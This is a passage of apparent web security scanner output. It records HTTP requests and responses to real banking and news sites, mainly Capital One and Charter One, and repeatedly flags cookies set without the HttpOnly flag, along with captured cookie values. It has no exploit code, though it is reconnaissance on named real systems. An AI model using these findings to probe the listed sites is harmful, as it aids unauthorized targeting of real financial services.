Set-Cookie: itc=CAPITALONE11NZZZintmktgD4; expires=Sun, 03-Apr-2011 22:00:19 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:00:19 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; expires=Fri, 04-Mar-2011 22:00:19 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:00:18 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 39529
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /creditcards/gateway/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:12:45 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com
Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com
Location: http://www.capitalone.com/creditcards/?
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /indexn.php HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.capitalone.c ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/thirdparty/xplus1/xp1vars.js.php HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Referer: https://www.capitalone.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000; v1st=FBBE6C4A1C9B8436; itc=CAPITALONE11NZZZintmktgD4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB
Response
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:21 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:00:20 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: application/x-javascript
Content-Length: 125
var xp1CC = ""; var xp1zip = "0"; var xp1region = "national"; var xp1eosSet = "N"; var xp1PageName = "";
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /greenliving/bluefin-tuna-sells-for-396000.html HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /401K_notice.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:16:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:26:27 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 5562
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /branchlocator/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:16:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26553
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards-and-rewards/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:14:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fcards-and-rewards%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 196
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcards-and-rewards%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards-and-rewards/default.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:14:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fcards-and-rewards%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 196
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcards-and-rewards%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards-and-rewards/defaultbroad.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:14:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/error.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 138
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2ferror.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /careers/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:16:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:26:23 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 19220
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:12:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fchecking%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 187
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fchecking%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking/banking-packages.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:12:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fchecking%2fbanking-packages.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 196
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fchecking%252fbanking-packages.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking/default.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:12:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fchecking%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 187
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fchecking%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking/gold-banking-package.aspx?WT.ac=circlegoldmoneymarket HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:12:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fchecking%2fgold-banking-package.aspx%3fwt.ac%3dcirclegoldmoneymarket
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 236
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fchecking%252fgold-banking-package.aspx%253fwt.ac%253dcirclegoldmoneymark ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking/order-checks.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:12:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fchecking%2forder-checks.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 192
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fchecking%252forder-checks.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /commercial-banking/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:12:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fcommercial-banking%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 197
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcommercial-banking%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:16:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fcommunity%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 188
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcommunity%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /customer-service/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:12:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fcustomer-service%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 195
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcustomer-service%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /everyday-points/default.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:15:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:25:32 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 12456
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_objCommonHeader_mSe ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /everyday-points/terms-and-conditions.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:15:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:25:32 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 30469
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_objCommonHeader_mSe ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /greensense/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:15:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:25:30 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 19392
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http:/www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <h ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home-equity/find-your-fit.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 02 Feb 2011 22:14:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.charterone.com/home-equity/help-me-choose-home-equity.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: private
Content-Length: 0
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home-equity/lines.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:14:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fhome-equity%2flines.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 188
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fhome-equity%252flines.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home-equity/loans.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:14:16 GMT
Server: Microsoft-IIS/6.0
